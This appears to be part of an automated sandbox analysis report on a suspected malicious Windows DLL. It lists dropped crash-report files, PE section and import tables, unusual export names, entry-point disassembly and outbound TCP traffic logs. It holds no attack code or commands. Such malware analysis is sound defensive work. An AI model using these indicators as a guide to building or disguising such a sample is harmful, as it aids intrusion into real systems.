                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:35:41 2021, 0x1205a4 type
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35698
                                                                                                          Entropy (8bit):2.408099527928471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:C8gqrzXek1f0MLLIZhsRUlLiAVQk1/eB0nnS8+T:CIrKkdtL4hsR0OAqkIinh+T
                                                                                                          MD5:CDC28147E5D2C8FEE62D5F364AFA21BA
                                                                                                          SHA1:53EB490C35EAB537578892AD7F05349AB808A1DD
                                                                                                          SHA-256:8362B9A6373C9A5750EE252FB5C49CA38A8A60C04E9164CBCCF9AE86E5D904CE
                                                                                                          SHA-512:A217C4D04E56067D60012B814BF2862262E495B1389D70747E3E90F06C4A5F995F06CF75FADB968447BCD1181CA4B9061C5BA3D979D4069FC14F0942C05ECBB9
                                                                                                          Malicious:false
                                                                                                          Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........?.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CD2.tmp.WERInternalMetadata.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8306
                                                                                                          Entropy (8bit):3.6950985837951538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Rrl7r3GLNiFs6yP6YuW6pgmfTkOStwZCpDC89bYAsf7ZIm:RrlsNiu686Y/6pgmfTkOStwyYTf7z
                                                                                                          MD5:53A8713A3D518BF4398C7DC5EE97832E
                                                                                                          SHA1:6B32AD490FF98765EB4BBAAA70FFD48472359318
                                                                                                          SHA-256:A30F7DE6606984ECF22AA59393DE486BD3FE946732A3CF72C73A5455255AE5E8
                                                                                                          SHA-512:4179034EA76563C8B04680761DE582CB24C3F378576DCE61FD76237922081FE334B5415871E4A09A095DB7BC5A7C37C221CC785A9ED6CE8C1F0765EC0AD96DB5
                                                                                                          Malicious:false
                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.8.4.<./.P.i.d.>.......
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER837A.tmp.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4630
                                                                                                          Entropy (8bit):4.455697919266282
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cvIwSD8zsmJgtWI9p5rWSC8BfM8fm8M4JCds9Fex+q8/5Y4SrSxd:uITf8yUSNpxJ4xzDWxd
                                                                                                          MD5:B1DDC3420DFB7C2BBA3617F7CDF427FE
                                                                                                          SHA1:E23312B013B75C48E88A357A5785379F3DCFF69C
                                                                                                          SHA-256:B245B4E2C87A879130313F58B73202BFAAD8682932594690378021E4AED06ACA
                                                                                                          SHA-512:A72D80A2C8C5B06DFC7AA9B79A12FEDDD40BCFD5633AA9E3591693278561DF8D24AE857B9E74B8B95BCB10656F2C33631E63BCD939C6F9B5B6D1AF88E6B8E085
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER88E7.tmp.WERInternalMetadata.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8406
                                                                                                          Entropy (8bit):3.7004888092021453
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Rrl7r3GLNiF06X6Yuy6pgmf8eSjwZCprI89bsfsf8Em:RrlsNiW6X6Yb6pgmf8eSjwEsEfW
                                                                                                          MD5:F9B0FDED752EEA1C8BA95054EBA02EFE
                                                                                                          SHA1:2D27B171C34E2014EF1EF7CACC6B1F114499504C
                                                                                                          SHA-256:F2689516846EB5ED28B5A31DBD00A54AE06BBCAF0FA57CFDB94889D8E4B7BD7C
                                                                                                          SHA-512:15602AAE224847856A1DBA1C017A5D38D1B45B05B8EF78743525D03E7A75BA62ADD39DF76C5995E5D90F7EA34BDC971691996F92B80133FB560388E305A6D5DD
                                                                                                          Malicious:false
                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.7.2.<./.P.i.d.>.......
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CD0.tmp.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4771
                                                                                                          Entropy (8bit):4.483807136834076
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cvIwSD8zsmJgtWI9p5rWSC8B2+8fm8M4JCds0MFP+q8vjs0Ji4SrSUd:uITf8yUSN87JyOKtJiDWUd
                                                                                                          MD5:40F554717EE45DC3457D352B8AE8CFA3
                                                                                                          SHA1:0BC9E6BF5E0BEB76C6996B7F162A3C4E60F3CEFC
                                                                                                          SHA-256:1F4F99A93A24C94FAC6CF76BBC62F517BEB2A4000011AFCE29662591E2C55F84
                                                                                                          SHA-512:7E70A8B81B3FA28DF4F997DBC8FE9D7DB3C926FE6C5A7FA5F98A062A78412E458B61F7A60D50940E13514A2252D0F40FE7F02FED07A8F9FF65A273858C654242
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.67002840473361
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:B6VQd36tt6.dll
                                                                                                          File size:718336
                                                                                                          MD5:c4c060ec6b1e42d70972d0af66a04e66
                                                                                                          SHA1:3ef84847fceb31b8814c12c94c57c72a5281d6f5
                                                                                                          SHA256:47715e425398283d53019c270311ad0c709f660048d2f884d5116d80b983743f
                                                                                                          SHA512:5553d68867af378d347620208b35d4d6261526770cf2a47884f0eff17392cedfa91ab491265717a459b4ccbe43f490a90caaf9289b9f92e8cd63140710e9ca78
                                                                                                          SSDEEP:12288:QUAQSxT6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XPGAsx:Qz3xT6fq8Np6bTPPaBreaZlYCOSVolam
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..Ox.`.x.`.x.`..~..{.`.q...m.`...b.|.`...e.q.`...c.l.`..~..o.`.x.a...`...e...`...`.y.`...`.y.`.x...y.`...b.y.`.Richx.`........

                                                                                                          File Icon

                                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x1003ab77
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x10000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0x5F6FEFFF [Sun Sep 27 01:50:55 2020 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:8acc1c3be9064cb55c8e3d7147f3d7c3

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                                          jne 00007F07BCC462C7h
                                                                                                          call 00007F07BCC46DB2h
                                                                                                          push dword ptr [ebp+10h]
                                                                                                          push dword ptr [ebp+0Ch]
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007F07BCC4616Ah
                                                                                                          add esp, 0Ch
                                                                                                          pop ebp
                                                                                                          retn 000Ch
                                                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                                          pop ecx
                                                                                                          pop edi
                                                                                                          pop edi
                                                                                                          pop esi
                                                                                                          pop ebx
                                                                                                          mov esp, ebp
                                                                                                          pop ebp
                                                                                                          push ecx
                                                                                                          ret
                                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                                          xor ecx, ebp
                                                                                                          call 00007F07BCC45EC3h
                                                                                                          jmp 00007F07BCC462A0h
                                                                                                          mov ecx, dword ptr [ebp-14h]
                                                                                                          xor ecx, ebp
                                                                                                          call 00007F07BCC45EB2h
                                                                                                          jmp 00007F07BCC4628Fh
                                                                                                          push eax
                                                                                                          push dword ptr fs:[00000000h]
                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          mov dword ptr [eax], ebp
                                                                                                          mov ebp, eax
                                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                                          xor eax, ebp
                                                                                                          push eax
                                                                                                          push dword ptr [ebp-04h]
                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                          ret
                                                                                                          push eax
                                                                                                          push dword ptr fs:[00000000h]
                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          mov dword ptr [eax], ebp
                                                                                                          mov ebp, eax
                                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                                          xor eax, ebp
                                                                                                          push eax
                                                                                                          mov dword ptr [ebp-10h], eax
                                                                                                          push dword ptr [ebp-04h]
                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                          ret
                                                                                                          push eax
                                                                                                          inc dword ptr fs:[eax]

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x79f710x7a000False0.510071801358data6.75461975802IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x7b0000x2e5860x2e600False0.556377400606data5.60164615331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                          USER32.dllTranslateMessage, CreateMenu, UnregisterHotKey, DeferWindowPos, RegisterWindowMessageW, BeginDeferWindowPos, GetPropW
                                                                                                          MSACM32.dllacmFormatChooseW, acmFilterEnumW, acmFilterTagDetailsW, acmFilterDetailsW, acmDriverClose, acmFormatDetailsW, acmDriverOpen, acmDriverPriority, acmDriverMessage, acmFormatTagEnumW, acmDriverAddW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverEnum, acmFormatEnumW, acmDriverID, acmFormatSuggest, acmDriverDetailsW, acmFilterChooseW, acmGetVersion, acmDriverRemove, acmMetrics

                                                                                                          Exports

                                                                                                          NameOrdinalAddress
                                                                                                          BeGrass10x10016020
                                                                                                          Fieldeight20x100162f0
                                                                                                          Often30x10016510
                                                                                                          Townenter40x100167a0

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 11, 2021 22:35:35.259776115 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:35.259819031 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:35.260531902 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:35.267252922 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:35.267280102 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:35.636917114 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:35.637025118 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:35.639486074 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:35.639499903 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:35.639818907 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:35.694258928 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:35.977374077 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.019140005 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.100270987 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.100338936 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.100430965 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.104357958 CEST49761443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.104392052 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.720808029 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.720849037 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.720937967 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.728974104 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.729003906 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.044668913 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.044819117 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.047748089 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.047772884 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.048060894 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.101821899 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.458256960 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.503140926 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.574573994 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.574657917 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.575021982 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.575855970 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.575877905 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.575956106 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.575964928 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:36:17.610728979 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:17.610759974 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:17.610867977 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:17.611726999 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:17.611743927 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.128029108 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.128792048 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.132210016 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.132224083 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.132575989 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.138678074 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.179141998 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.307991028 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.308073044 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.308492899 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.308541059 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.308572054 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.308588028 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.308599949 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.383008957 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.383053064 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.386106014 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.386921883 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.386948109 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.481684923 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.481864929 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.488152981 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.488179922 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.488593102 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.491640091 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521219969 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.521337032 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.521491051 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521552086 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521565914 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.521938086 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521955013 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.550992966 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.551038980 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.551259995 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.552093983 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.552125931 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.647032022 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.647165060 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.651844978 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.651861906 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.652160883 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.654882908 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.695138931 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.718173981 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.718261957 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.718323946 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.726743937 CEST49779443192.168.2.652.98.208.66
